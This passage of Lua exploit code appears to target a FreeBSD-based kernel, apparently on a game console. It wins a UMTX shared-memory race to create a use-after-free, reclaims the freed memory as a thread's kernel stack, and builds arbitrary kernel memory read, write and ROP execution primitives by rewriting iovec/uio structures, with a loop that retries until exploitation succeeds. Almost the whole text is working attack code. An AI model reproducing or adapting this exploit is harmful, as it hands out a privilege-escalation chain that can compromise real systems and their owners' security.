            -- Destroy just created UMTX.
            dbgf("main_thread: destroying new umtx shm #2")
            if not umtx_shm_destroy(main_rop, estate.shm_key_2) then
                errorf("main_thread: destroying new umtx shm #2 failed")
            end
        end
        dbgf("main_thread: switching to initial core")
        if not set_current_thread_cpu_affinity(main_rop, exp.MAIN_THREAD_CORES) then
            errorf("main_thread: switching to initial core failed")
        end
        dbgf("main_thread: spraying done")
        -- If lookup succeeded then do check against SHM file object to determine file descriptor.
        winner_fd = check_for_corruption(main_rop)
        if winner_fd ~= nil then
            dbgf("main_thread: checking succeeded with winner fd: %d", winner_fd)
            memory.write32(estate.winner_fd_addr, winner_fd)
        else
            dbgf("main_thread: checking failed")
        end
        -- Close unneeded file descriptors (all sprayed fds except the winner).
        for i = 1, exp.MAX_DESTROYER_THREADS do
            local fd_addr = estate.fds_for_reclaim_addr + (i - 1) * 0x8
            local need_close = true
            fd = as_sint32(memory.read32(fd_addr))
            if fd >= 0 then
                if winner_fd ~= nil and fd == winner_fd then
                    -- We do not need to close it, so clear descriptor.
                    memory.write32(fd_addr, -1)
                    estate.destroyer_index = i
                    need_close = false
                end
                if need_close then
                    dbgf("main_thread: closing new fd %d of racing thread #2/#%u", fd, i)
                    if not close_file(main_rop, fd) then
                        errorf("main_thread: closing new fd %d of racing thread #2/#%u failed", fd, i)
                    end
                    memory.write32(fd_addr, -1)
                end
            end
        end
        -- Notify all threads that they should not be destroyed yet.
        memory.write32(estate.destroy_flag_addr, 0)
        -- Notify other threads that check was done.
        memory.write32(estate.check_done_flag_addr, 1)
        if n == exp.MAX_DESTROYER_THREADS and winner_fd ~= nil then
            -- Set new SHM size (to kernel stack size, for the later reclaim).
            dbgf("main_thread: truncating winner fd %d", winner_fd)
            if not truncate_file(main_rop, winner_fd, globals.kstack_size) then
                errorf("main_thread: truncating winner fd %d failed", winner_fd)
            end
            if toggle_debugging then
                local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))
                local lookup_size = get_file_size(main_rop, lookup_fd)
                dbgf("main_thread: victim fd %d size: %s", lookup_fd, lookup_size)
                local winner_size = get_file_size(main_rop, winner_fd)
                dbgf("main_thread: winner fd %d size: %s", winner_fd, winner_size)
            end
            -- Notify other threads that race succeeded.
            memory.write32(estate.race_done_flag_addr, 1)
            dbgf("main_thread: we have some result!!!")
        end
        -- Wait until other threads are ready to finish.
        wait_for(estate.num_ready_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be ready for finish") -- plus one for lookup thread
        -- Notify other threads that we are done.
        memory.write32(estate.done_flag_addr, 1)
        -- Wait until other threads are finished.
        wait_for(estate.num_finished_threads_addr, exp.MAX_DESTROYER_THREADS + 1, " threads to be finished") -- plus one for lookup thread
        -- Reset everything if we did not find winner file descriptor.
        if winner_fd == nil then
            dbgf("main_thread: cleaning state")
            cleanup_state(main_rop)
            dbgf("main_thread: resetting state")
            reset_state(main_rop)
        end
        dbgf("main_thread: finishing")
        num_iterations = num_iterations + 1
    end
    -- Recover initial CPU affinity mask for main thread.
    -- NOTE(review): |initial_cpu_affinity| is presumably saved before this
    -- function runs (not visible in this chunk) — verify.
    dbgf("main_thread: recovering initial cpu affinity mask for main thread")
    if not set_current_thread_cpu_affinity(main_rop, initial_cpu_affinity) then
        errorf("recovering initial cpu affinity mask for main thread failed")
    end
    -- Redundant check of file descriptors.
    if winner_fd ~= nil then
        fd = as_sint32(memory.read32(estate.original_fd_addr))
        dbgf("original fd: %d", fd)
        fd = as_sint32(memory.read32(estate.lookup_fd_addr))
        if fd < 0 then
            errorf("race done but no victim fd")
        end
        dbgf("victim fd: %d", fd)
        fd = as_sint32(memory.read32(estate.winner_fd_addr))
        if fd < 0 then
            errorf("race done but no winner fd")
        end
        dbgf("winner fd: %d", fd)
        logf("exploit succeeded in %u iterations", num_iterations)
    else
        warnf("exploit failed after %u iterations", num_iterations)
    end
    -- Notify other threads that we are done.
    memory.write32(estate.race_done_flag_addr, 1)
    return winner_fd ~= nil
end
-------------------------------------------------------------------------------
-- Compute the address of the |struct pcb| located near the top of a kernel
-- stack: stack base + num_kstack_pages * PAGE_SIZE, minus the XSAVE-aligned
-- extended-state save area, minus sizeof(struct pcb).
local function get_pcb_td_from_kstack(kstack_addr) -- returns pointer to |struct pcb|
    -- Based on implementation of |get_pcb_td|.
    assert(is_uint64(kstack_addr))
    return kstack_addr + globals.num_kstack_pages * globals.PAGE_SIZE - bit32.round_pow2(globals.CPU_MAX_EXT_STATE_SIZE, globals.XSAVE_AREA_ALIGN) - globals.sizeof_pcb
end
-- Compute the address of the FPU save area (|struct savefpu|), which sits
-- immediately after the |struct pcb| on the kernel stack.
local function get_pcb_user_save_td_from_kstack(kstack_addr) -- returns pointer to |struct savefpu|
    -- Based on implementation of |get_pcb_user_save_td|.
    return get_pcb_td_from_kstack(kstack_addr) + globals.sizeof_pcb
end
-- Compute the address of the |struct trapframe|, which sits immediately
-- below the |struct pcb| on the kernel stack.
local function get_frame_from_kstack(kstack_addr) -- returns pointer to |struct trapframe|
    -- Based on implementation of |cpu_thread_alloc|.
    return get_pcb_td_from_kstack(kstack_addr) - globals.sizeof_trapframe
end
-- Post-exploitation stage. After the UMTX race has been won:
--   1) close the winner fd to free the SHM object backing it,
--   2) mmap the lookup fd so we keep a user mapping of the freed pages,
--   3) spin up reclaim threads so the kernel reuses those pages as one of
--      their kernel stacks, then scan the mapping for a marker to identify
--      which reclaim thread's kstack we now control,
--   4) tear down the racing/reclaim threads and shared ROP memory.
-- On success sets estate.victim_thread_id/-index/-thr (and possibly
-- estate.victim_kthread_addr) and returns true; returns false otherwise.
function post_exploit()
	local status = false
	assert(estate.destroyer_index ~= nil)
	-- Reset destroy flag.
	memory.write32(estate.destroy_flag_addr, 0)
	-- Switch main thread core to bypass any possible freed memory caching.
	--dbgf("switching main thread core to racing thread #2/#%u core", estate.destroyer_index)
	--if not set_current_thread_cpu_affinity(main_rop, exp.DESTROYER_THREAD_CORES[estate.destroyer_index]) then
	--	errorf("switching main thread core to racing thread #2/#%u core failed", estate.destroyer_index)
	--end
	dbgf("creating extra umtx shm")
	for i = 1, exp.MAX_EXTRA_UMTX_SHMS do
		-- Create extra UMTX and corresponding SHM object.
		local fd = umtx_shm_create(main_rop, estate.shm_key_3)
		if fd == nil then
			errorf("creating extra umtx shm failed")
		end
		dbgf("extra fd [%d]: %d", i, fd)
	end
	local winner_fd = as_sint32(memory.read32(estate.winner_fd_addr))
	local lookup_fd = as_sint32(memory.read32(estate.lookup_fd_addr))
	-- Free SHM object.
	if winner_fd >= 0 then
		dbgf("closing winner fd %d", winner_fd)
		if not close_file(main_rop, winner_fd) then
			errorf("closing winner fd %d failed", winner_fd)
		end
		memory.write32(estate.winner_fd_addr, -1)
	end
	-- Map memory of freed SHM object.
	dbgf("mapping memory of victim fd %d", lookup_fd)
	local addr = map_memory(main_rop, 0, globals.kstack_size, 0, globals.MAP_SHARED, lookup_fd, 0)
	if addr ~= nil then
		-- Remember the mapping; it is deliberately never unmapped (see below).
		table.insert(estate.saved_kstack_addrs, uint64:new(addr))
		dbgf("protecting memory of victim fd %d", lookup_fd)
		if protect_memory(main_rop, addr, globals.kstack_size, bit32.bor(globals.PROT_READ, globals.PROT_WRITE)) then
			estate.kstack_addr = addr
			logf("kstack %s of size 0x%x", estate.kstack_addr, globals.kstack_size)
		else
			warnf("protecting memory of victim fd %d failed", lookup_fd)
			addr = nil
		end
	end
	if addr ~= nil then
		-- Start reclaim threads to occupy freed SHM object for kernel stack.
		logf("starting reclaim threads")
		for i = 1, exp.MAX_RECLAIM_OBJECTS do
			dbgf("starting reclaim thread #%u", i)
			local thr = estate.reclaim_thrs[i]
			if thr:start() then
				-- Wait some time, otherwise we may not be able to get thread id.
				thr:wait_to_become_live()
				local thread_id = thr:thread_id()
				-- Doing this cause weird thread racing issues bringing inconsistent results when doing kernel memory access,
				-- however it does not cause any serious problems.
				-- Move reclaim thread to destroyer thread core.
				--if not set_thread_cpu_affinity(main_rop, thread_id, exp.DESTROYER_THREAD_CORES[estate.destroyer_index]) then
				--	errorf("setting reclaim thread #%u cpu affinity mask failed", i)
				--end
				if toggle_set_thread_priorities then
					-- Set reclaim thread priority.
					if not set_thread_priority(main_rop, thread_id, { type = exp.THREAD_PRIORITY_TYPE, prio = exp.RECLAIM_THREAD_PRIORITY }) then
						errorf("setting reclaim thread #%u priority failed", i)
					end
				end
				dbgf("reclaim thread #%u started with id %d (0x%x)", i, thread_id, thread_id)
			else
				warnf("starting reclaim thread #%u failed", i)
			end
		end
		logf("reclaim threads started")
		-- When doing thread creation memory of freed SHM object can be occupied and initialized with zeros.
		-- See: sys_thr_new -> kern_thr_new -> thread_create -> kern_thr_alloc
		-- Kick all reclaim threads at once, thus they will start real execution at same time.
		memory.write32(estate.ready_flag_addr, 1)
		logf("checking if reclaimed memory belongs to controlled thread")
		-- Check if mapped buffer overlaps kernel stack of our reclaim thread.
		-- Only the first 3 bytes of the marker are used as the search pattern;
		-- the 4th byte encodes which reclaim thread wrote it (see below).
		local pattern = pb4(exp.RECLAIMED_THREAD_MARKER_BASE):sub(1, 3)
		local num_attempts = 1
		local thread_id
		local scan_size = 0x1000
		-- Scan only the topmost page of the would-be kernel stack.
		local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)
		for i = 1, exp.MAX_SEARCH_LOOP_ATTEMPTS do
			-- Let reclaimed threads some time to run.
			usleep(main_rop, exp.KSTACK_WAIT_PERIOD)
			-- Determine if mapped memory region is readable.
			local mem_size = memory.determine_size(estate.kstack_addr, 1)
			if mem_size == nil or mem_size:is_zero() then
				-- Does kernel reclaimed our VM object?
				dbgf("reading reclaimed memory failed")
				break
			end
			local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
			local pos
			if dump_kstack_partially then
				-- Determine if we have some data in mapped buffer.
				pos = kstack_buf:find("[^\0]")
				if pos ~= nil then
					logf("\n%s\n", hexdump(kstack_buf))
				end
			end
			pos = kstack_buf:find(pattern, 1, true)
			if pos ~= nil then
				dbgf("pattern found")
				if dump_kstack then
					logf("kernel stack:\n%s\n", hexdump(kstack_buf))
				end
				-- Harvest kernel pointers from the stack; the most frequent
				-- heap pointer is taken as the victim's |struct thread|.
				local kptrs, num_kptrs = scan_buffer_for_kptrs(kstack_buf)
				if num_kptrs > 0 then
					if dump_kstack_ptrs then
						logf("kernel pointers in kernel stack:");
						logf(inspect(kptrs))
					end
					-- Count occurrences of each heap pointer value.
					local heap_kptrs = {}
					if kptrs.heap ~= nil then
						for i, kptr in ipairs(kptrs.heap) do
							local key = tostring(kptr)
							if heap_kptrs[key] == nil then
								heap_kptrs[key] = 0
							end
							heap_kptrs[key] = heap_kptrs[key] + 1
						end
					end
					kptrs = table.sort_keys(heap_kptrs, function(a, b)
						return a > b
					end)
					if #kptrs > 0 then
						local key = kptrs[1]
						if heap_kptrs[key] >= exp.TD_OCCURRENCE_THRESHOLD then
							local kthread_addr = uint64:new(key)
							logf("kernel thread @ %s", kthread_addr)
							estate.victim_kthread_addr = kthread_addr
						else
							warnf("thread kptr threshold not reached")
						end
					end
				end
				-- Get last byte of pattern and convert it to thread index.
				-- NOTE(review): 0x41 is ASCII 'A'; the subsequent >= 1 check
				-- implies marker bytes start at 'B' for thread #1 — confirm
				-- against the reclaim thread marker writer.
				local thread_index = string.byte(kstack_buf, pos + #pattern) - 0x41
				dbgf("thread index: %d", thread_index)
				if thread_index >= 1 and thread_index <= #estate.reclaim_thrs then
					local thr = estate.reclaim_thrs[thread_index]
					assert(thr ~= nil)
					thread_id = thr:thread_id()
					memory.write32(estate.victim_thread_id_addr, thread_id)
					logf("found victim thread using %u attempts: %d (0x%x)", num_attempts, thread_id, thread_id)
					break
				end
			end
			num_attempts = num_attempts + 1
		end
		if thread_id ~= nil then
			status = true
		else
			warnf("finding victim thread failed");
		end
		-- Trigger other threads to terminate execution.
		memory.write32(estate.destroy_flag_addr, 1)
		-- Let reclaimed thread to do blocking call.
		usleep(main_rop, exp.FINAL_WAIT_PERIOD)
		logf("joining reclaim threads")
		-- Join every reclaim thread except the victim, which must stay alive
		-- (it is blocked in the kernel and its kstack is our window).
		for i = 1, exp.MAX_RECLAIM_OBJECTS do
			local thr = estate.reclaim_thrs[i]
			if thr:thread_id() == thread_id then
				logf("saving victim thread #%u", i)
				if toggle_state_debugging then
					logf("victim thread rop stack @ %s", thr:thread_rop():data_addr())
					logf(thr:dump_rop_stack(filter_addr_keys(estate)))
				end
				estate.victim_thread_id = thread_id
				estate.victim_thread_index = i
				estate.victim_thr = thr
			else
				dbgf("joining reclaim thread #%u", i)
				if not thr:join() then
					errorf("joining reclaim thread #%u failed", i)
				end
			end
			estate.reclaim_thrs[i] = nil
		end
		logf("reclaim threads joined")
		estate.reclaim_thrs = nil
		collectgarbage()
	else
		warnf("mapping memory of victim fd %d failed", lookup_fd)
		-- Trigger all threads to terminate execution.
		memory.write32(estate.destroy_flag_addr, 1)
	end
	-- Give threads some time to finish their job.
	usleep(main_rop, exp.FINAL_WAIT_PERIOD)
	logf("joining racing thread #1")
	if not estate.lookup_thr:join() then
		errorf("joining racing thread #1 failed")
	end
	logf("racing thread #1 joined")
	estate.lookup_thr = nil
	logf("joining racing threads #2")
	for i = 1, exp.MAX_DESTROYER_THREADS do
		dbgf("joining racing thread #2/#%u", i)
		local thr = estate.destroyer_thrs[i]
		if not thr:join() then
			errorf("joining racing thread #2/#%u failed", i)
		end
	end
	logf("racing threads #2 joined")
	estate.destroyer_thrs = nil
	-- Release shared memory of all ROP chains and if reclaim was successful
	-- then recreate memory for reclaimed thread only using same address as
	-- before thus it will continue its execution normally.
	if estate.victim_thread_index ~= nil then
		logf("releasing shared memory and recreating it for reclaimed thread #%u", estate.victim_thread_index)
		if not release_and_recreate_shared_memory_if_needed(main_rop, estate.victim_thread_index) then
			warnf("releasing shared memory and recreating it for reclaimed thread #%u failed", estate.victim_thread_index)
		end
	else
		logf("releasing shared memory")
		if not release_and_recreate_shared_memory_if_needed(main_rop) then
			warnf("releasing shared memory failed")
		end
	end
	if not status then
		-- Do not unmap memory otherwise kernel may panic.
		--dbgf("unmapping memory %s of size 0x%x", estate.kstack_addr, globals.kstack_size)
		--if not unmap_memory(main_rop, estate.kstack_addr, globals.kstack_size) then
		--	errorf("unmapping memory failed")
		--end
		estate.exec_rop = nil
	else
		assert(estate.victim_thread_index ~= nil)
	end
	collectgarbage()
	return status
end
runner(function()
	-- Top-level retry loop: keep re-running the whole exploit chain
	-- (prepare -> initial race -> post exploitation) until post
	-- exploitation succeeds, sleeping one second between attempts.
	-- Preparation failure is fatal (errorf raises).
	local num_attempts = 1
	local succeeded = false
	repeat
		if not prepare_exploit() then
			errorf("preparation failed")
		end
		logf("doing initial exploitation")
		if initial_exploit() then
			logf("doing post exploitation")
			if post_exploit() then
				succeeded = true
			else
				warnf("post exploitation failed")
			end
		else
			warnf("initial exploitation failed")
		end
		if not succeeded then
			num_attempts = num_attempts + 1
			sleep(main_rop, 1)
		end
	until succeeded
	logf("exploitation done in %u attempts", num_attempts)
end)
-------------------------------------------------------------------------------
local function kern_ensure_buffer_size(size)
	-- Validate a transfer size (uint64 object or plain number) against the
	-- pipe buffer limit and normalize it to a plain Lua number.
	-- Returns the normalized size, or nil (after a warning) when too large.
	if is_uint64(size) then
		if size > exp.MAX_PIPE_BUFFER_SIZE then
			warnf("too large size %s", size)
			return nil
		end
		return size.lo
	end
	assert(type(size) == "number")
	if size > exp.MAX_PIPE_BUFFER_SIZE then
		warnf("too large size 0x%x", size)
		return nil
	end
	return size
end
-- Slow kernel-memory read primitive built on a pipe plus kernel-stack
-- manipulation of the victim (reclaimed) thread.
-- Copies |size| bytes from kernel address |kaddr| into user buffer |uaddr|.
-- |rop| is the main thread's ROP chain. Returns the number of bytes read,
-- or nil on failure.
function kern_read_slow(rop, kaddr, uaddr, size)
	assert(type(rop) == "table")
	-- Blocking algorithm for pipe:
	-- 1) On main thread start writing to pipe until we fill buffer of size equal to |BIG_PIPE_SIZE| (or |estate.pipe_buf_capacity|).
	-- Each write size should be less than |PIPE_MINDIRECT|, otherwise it will trigger |pipe_direct_write| which is
	-- not good if we want proper blocking.
	-- 2) On reclaim thread do write to same pipe again, thus getting block, then we should modify kernel stack of this thread and
	-- change |struct iov| and |struct uio|.
	-- 3) On main thread start reading from pipe using size of |BIG_PIPE_SIZE| (or |estate.pipe_buf_capacity|). It will unblock
	-- reclaim thread, so it starts writing to pipe using modified parameters. We should ignore data that was read.
	-- 4) On main thread start reading from same pipe again, but now using size we used when did modification.
	-- pipe_write(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
	-- uiomove(void* cp = &wpipe->pipe_buffer.buffer[wpipe->pipe_buffer.in], int n = segsize, struct uio* uio = uio)
	-- uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
	-- UIO_USERSPACE: copyin(const void* uaddr = iov->iov_base, void* kaddr = cp, size_t len = cnt)
	-- UIO_SYSSPACE: bcopy(const void* src = iov->iov_base, void* dst = cp, size_t len = cnt)
	assert(is_uint64(kaddr) or type(kaddr) == "number")
	assert(is_uint64(uaddr) or type(uaddr) == "number")
	size = kern_ensure_buffer_size(size)
	if size == nil then
		return nil
	elseif size == 0 then
		return 0
	end
	-- Scratch slots holding the victim thread's syscall result and errno.
	local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	local result, errno
	-- Clear pipe buffer.
	--mem_clear(rop, estate.pipe_buf_addr, estate.pipe_buf_capacity)
	-- Clear scratch area.
	memory.write64(return_value_addr, 0)
	memory.write64(errno_addr, 0)
	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)
	memory.write64(estate.rw_src_ptr_addr, kaddr)
	memory.write64(estate.rw_dst_ptr_addr, uaddr)
	memory.write64(estate.rw_size_addr, size)
	-- Preparation step to make further write call blocking.
	local count = math.floor(estate.pipe_buf_capacity / exp.MAX_PIPE_BUFFER_SIZE)
	--dbgf("pipe write count: %d", count)
	local garbage_size = 0
	for i = 1, count do
		--dbgf("writing to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, estate.pipe_buf_addr, exp.MAX_PIPE_BUFFER_SIZE)
		if result:is_minus_one() then
			warnf("write failed (errno:%d)", errno)
			return nil
		elseif result.lo == 0 then
			--dbgf("writing done")
			break
		end
		garbage_size = garbage_size + result.lo
		--dbgf("written 0x%x", result.lo)
	end
	--dbgf("garbage size 0x%x", garbage_size)
	-- Issue read command.
	--dbgf("issuing read command")
	memory.write32(estate.cmd_addr, exp.CMD_KREAD)
	-- Wait for blocking write call on other thread.
	yield(rop)
	-- We have this partial stack layout:
	-- struct {
	-- struct iovec aiov;
	-- struct uio auio;
	-- };
	--
	-- To locate it inside buffer let's make search pattern based on known |aiov|.
	local aiov = make_iovec(nil, { base = estate.pipe_buf_addr, len = size })
	--dbgf("aiov buffer:\n%s\n", hexdump(aiov))
	local scan_size = 0x1000
	local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)
	--dbgf("scanning kernel stack at %s of size 0x%x", scan_addr, scan_size)
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
		----dbgf("kernel stack:\n%s\n", hexdump(kstack_buf))
		-- Plain-text search (4th arg true disables Lua patterns) for the
		-- serialized iovec on the victim's kernel stack.
		local pos = kstack_buf:find(aiov, 1, true)
		if pos ~= nil then
			local offset = pos - 1
			local aiov_uaddr = scan_addr + offset
			local auio_uaddr = aiov_uaddr + globals.sizeof_iovec
			--dbgf("BINGO at 0x%x (%s)!!!", offset, aiov_uaddr)
			local base = memory.read64(aiov_uaddr + globals.offsetof_iovec_base)
			local len = memory.read32(aiov_uaddr + globals.offsetof_iovec_len)
			local segflg = memory.read32(auio_uaddr + globals.offsetof_uio_segflg)
			local rw = memory.read32(auio_uaddr + globals.offsetof_uio_rw)
			--dbgf("iovec:\n%s", inspect(parse_iovec(aiov_uaddr)))
			--dbgf("uio:\n%s", inspect(parse_uio(auio_uaddr)))
			if base == estate.pipe_buf_addr and len == size and segflg == globals.UIO_USERSPACE and rw == globals.UIO_WRITE then
				--dbgf("GOT MATCH!!!")
				--dbgf("old values: iovec_base:%s iovec_len:0x%x", base, len)
				--dbgf("new values: iovec_base:%s iovec_len:0x%x", kaddr, size)
				-- Redirect the blocked write's source to the kernel address and
				-- flip the segment flag so the kernel copies with bcopy
				-- (kernel space) instead of copyin.
				memory.write64(aiov_uaddr + globals.offsetof_iovec_base, kaddr)
				memory.write32(auio_uaddr + globals.offsetof_uio_segflg, globals.UIO_SYSSPACE)
				break
			end
		end
		yield(rop)
	end
	-- Extra step to unblock write call on other thread by reading back garbage data from pipe.
	--dbgf("reading garbage from pipe fd %d at %s of size 0x%x", estate.rpipe_fd, estate.pipe_buf_addr, garbage_size)
	result, errno = do_syscall_safe(rop, "read", estate.rpipe_fd, estate.pipe_buf_addr, garbage_size)
	if result:is_minus_one() then
		warnf("read failed (errno:%d)", errno)
		return nil
	elseif result.lo ~= garbage_size then
		warnf("read result is not consistent: %d vs %d", result.lo, garbage_size)
	end
	-- Wait until reclaim thread report about result.
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		yield(rop)
	end
	-- Get result from reclaim thread.
	result = memory.read64(return_value_addr)
	errno = memory.read32(errno_addr)
	--dbgf("reclaim thread result:%s errno:%d", result, errno)
	if result:is_minus_one() then
		warnf("write failed (errno:%d)", errno)
		return nil
	elseif result.lo ~= size then
		warnf("write result is not consistent: %d vs %d", result.lo, size)
	end
	-- Read data from corresponding pipe.
	--dbgf("reading data from pipe fd %d at %s of size 0x%x", estate.rpipe_fd, uaddr, size)
	result, errno = do_syscall_safe(rop, "read", estate.rpipe_fd, uaddr, size)
	--dbgf("our result:%s errno:%d", result, errno)
	if result:is_minus_one() then
		warnf("read failed (errno:%d)", errno)
		return nil
	end
	--dbgf("total read: 0x%x", result.lo)
	return result.lo
end
-- Slow kernel-memory write primitive built on a pipe plus kernel-stack
-- manipulation of the victim (reclaimed) thread.
-- Copies |size| bytes from user buffer |uaddr| to kernel address |kaddr|.
-- |rop| is the main thread's ROP chain. |params| is accepted for interface
-- compatibility and is unused in this implementation.
-- Returns the number of bytes written, or nil on failure.
function kern_write_slow(rop, kaddr, uaddr, size, params)
	assert(type(rop) == "table")
	-- pipe_read(struct file* fp, struct uio* uio, struct ucred* active_cred, int flags, struct thread* td)
	-- uiomove(void* cp = &rpipe->pipe_buffer.buffer[rpipe->pipe_buffer.out], int n = size, struct uio* uio = uio)
	-- uiomove_faultflag(void* cp = cp, int n = n, struct uio* uio = uio, int nofault = 0)
	-- UIO_USERSPACE: copyout(const void* kaddr = cp, void* uaddr = iov->iov_base, size_t len = cnt)
	-- UIO_SYSSPACE: bcopy(const void* src = cp, void* dst = iov->iov_base, size_t len = cnt)
	assert(is_uint64(kaddr) or type(kaddr) == "number")
	assert(is_uint64(uaddr) or type(uaddr) == "number")
	local result, errno
	local result2, errno2
	size = kern_ensure_buffer_size(size)
	if size == nil then
		return nil
	elseif size == 0 then
		return 0
	end
	-- Scratch slots holding the victim thread's syscall result and errno.
	local return_value_addr = estate.thread_return_value_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	local errno_addr = estate.thread_errno_addr + (exp.MAX_DESTROYER_THREADS + estate.victim_thread_index) * 0x8
	-- Clear pipe buffer.
	--mem_clear(rop, estate.pipe_buf_addr, estate.pipe_buf_capacity)
	-- Clear scratch area.
	memory.write64(return_value_addr, 0)
	memory.write64(errno_addr, 0)
	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)
	memory.write64(estate.rw_src_ptr_addr, uaddr)
	memory.write64(estate.rw_dst_ptr_addr, kaddr)
	memory.write64(estate.rw_size_addr, size)
	-- Issue write command.
	--dbgf("issuing write command")
	memory.write32(estate.cmd_addr, exp.CMD_KWRITE)
	-- Wait for blocking read call on other thread.
	yield(rop)
	-- We have this partial stack layout:
	-- struct {
	-- struct iovec aiov;
	-- struct uio auio;
	-- };
	--
	-- To locate it inside buffer let's make search pattern based on known |aiov|.
	local aiov = make_iovec(nil, { base = estate.pipe_buf_addr, len = size })
	--dbgf("aiov buffer:\n%s\n", hexdump(aiov))
	local scan_size = 0x1000
	local scan_addr = estate.kstack_addr + (globals.kstack_size - scan_size)
	--dbgf("scanning kernel stack at %s of size 0x%x", scan_addr, scan_size)
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		local kstack_buf = memory.read_buffer(scan_addr, scan_size - 0x10)
		--dbgf("kernel stack:\n%s\n", hexdump(kstack_buf))
		-- Plain-text search (4th arg true disables Lua patterns) for the
		-- serialized iovec on the victim's kernel stack.
		local pos = kstack_buf:find(aiov, 1, true)
		if pos ~= nil then
			local offset = pos - 1
			local aiov_uaddr = scan_addr + offset
			local auio_uaddr = aiov_uaddr + globals.sizeof_iovec
			--dbgf("BINGO at 0x%x (%s)!!!", offset, aiov_uaddr)
			local base = memory.read64(aiov_uaddr + globals.offsetof_iovec_base)
			local len = memory.read32(aiov_uaddr + globals.offsetof_iovec_len)
			local segflg = memory.read32(auio_uaddr + globals.offsetof_uio_segflg)
			local rw = memory.read32(auio_uaddr + globals.offsetof_uio_rw)
			--dbgf("iovec:\n%s", inspect(parse_iovec(aiov_uaddr)))
			--dbgf("uio:\n%s", inspect(parse_uio(auio_uaddr)))
			if base == estate.pipe_buf_addr and len == size and segflg == globals.UIO_USERSPACE and rw == globals.UIO_READ then
				--dbgf("GOT MATCH!!!")
				--dbgf("old values: iovec_base:%s iovec_len:0x%x", base, len)
				--dbgf("new values: iovec_base:%s iovec_len:0x%x", kaddr, size)
				-- Redirect the blocked read's destination to the kernel address
				-- and flip the segment flag so the kernel copies with bcopy
				-- (kernel space) instead of copyout.
				memory.write64(aiov_uaddr + globals.offsetof_iovec_base, kaddr)
				memory.write32(auio_uaddr + globals.offsetof_uio_segflg, globals.UIO_SYSSPACE)
				break
			end
		end
		yield(rop)
	end
	-- Write data into corresponding pipe.
	--dbgf("writing data to pipe fd %d at %s of size 0x%x", estate.wpipe_fd, uaddr, size)
	result, errno = do_syscall_safe(rop, "write", estate.wpipe_fd, uaddr, size)
	--dbgf("our result:%s errno:%d", result, errno)
	if result:is_minus_one() then
		warnf("write failed (errno:%d)", errno)
		return nil
	end
	-- Wait until reclaim thread report about result.
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		yield(rop)
	end
	-- Get result from reclaim thread.
	result2 = memory.read64(return_value_addr)
	errno2 = memory.read32(errno_addr)
	--dbgf("reclaim thread result:%s errno:%d", result2, errno2)
	if result2:is_minus_one() then
		warnf("read failed (errno:%d)", errno2)
		return nil
	end
	-- Need to ensure that results are consistent.
	if result.lo ~= result2.lo then
		warnf("read/write results are not consistent: %d vs %d", result2.lo, result.lo)
	end
	--dbgf("total written: 0x%x", result2.lo)
	return result2.lo
end
-- Execute a ROP chain on the victim (reclaimed) thread.
-- |rop|: main thread ROP chain, used for cooperative yielding.
-- |rop_cb(exec_rop)|: optional callback that fills the victim's ROP chain
--   before it runs.
-- |body_cb(rop, kstack_addr, kstack_size)|: optional callback polled on the
--   main thread while the command is in flight; returning false stops
--   further polling (the wait for completion continues).
-- The chain finishes by pivoting back to the victim's saved stack return
-- address so the thread resumes normal execution afterwards.
function kern_exec(rop, rop_cb, body_cb)
	assert(type(rop) == "table")
	-- Fill ROP chain.
	-- BUGFIX: was `assert(type(estate.exec_rop) ~= nil)` — `type()` never
	-- returns nil, so that assertion could never fire. Check the actual type.
	assert(type(estate.exec_rop) == "table")
	estate.exec_rop:reset()
	if type(rop_cb) == "function" then
		rop_cb(estate.exec_rop)
	end
	-- Fetch the saved return stack pointer slot of the victim thread and
	-- pivot back into it at the end of the chain.
	local stack_return_addr = memory.read64(estate.reclaim_thread_stack_return_addr + (estate.victim_thread_index - 1) * 0x8)
	assert(stack_return_addr:is_non_zero())
	estate.exec_rop:push_set_rsp(stack_return_addr)
	estate.exec_rop:fixup_markers()
	if toggle_state_debugging then
		logf("exec rop stack @ %s", estate.exec_rop:data_addr())
		logf(estate.exec_rop:dump(filter_addr_keys(estate)))
	end
	-- Set up parameters for kernel function stack manipulation.
	memory.write32(estate.cmd_wait_flag_addr, 1)
	-- Issue execute command.
	--dbgf("issuing execute command")
	memory.write32(estate.cmd_addr, exp.CMD_KEXEC)
	local done = false
	while memory.read32(estate.cmd_wait_flag_addr) == 1 do
		if not done and type(body_cb) == "function" then
			-- An explicit false (not nil) from the callback disables it for
			-- the remaining iterations. (Equivalent to the original
			-- `result ~= nil and not result`.)
			local result = body_cb(rop, estate.kstack_addr, globals.kstack_size)
			if result == false then
				done = true
			end
		end
		yield(rop)
	end
end
function kern_leak_stack_kptrs(rop, rop_cb, sleep_time, dump_ptrs)
	-- Leak kernel pointers from the victim thread's kernel stack: park the
	-- victim in a kernel |nanosleep|, then scan the top page of its stack
	-- (visible through our user mapping) for kernel-pointer-looking values.
	-- |sleep_time|: optional timespec-like table, defaults to 1 second.
	-- |dump_ptrs|: when true, logs every pointer set found during scanning.
	-- Returns the merged table of collected kernel pointers.
	if dump_ptrs == nil then
		dump_ptrs = false
	end
	local timeout = sleep_time
	if timeout == nil then
		timeout = { sec = 1, nsec = 0 }
	end
	make_timespec(estate.timeout_addr, timeout)
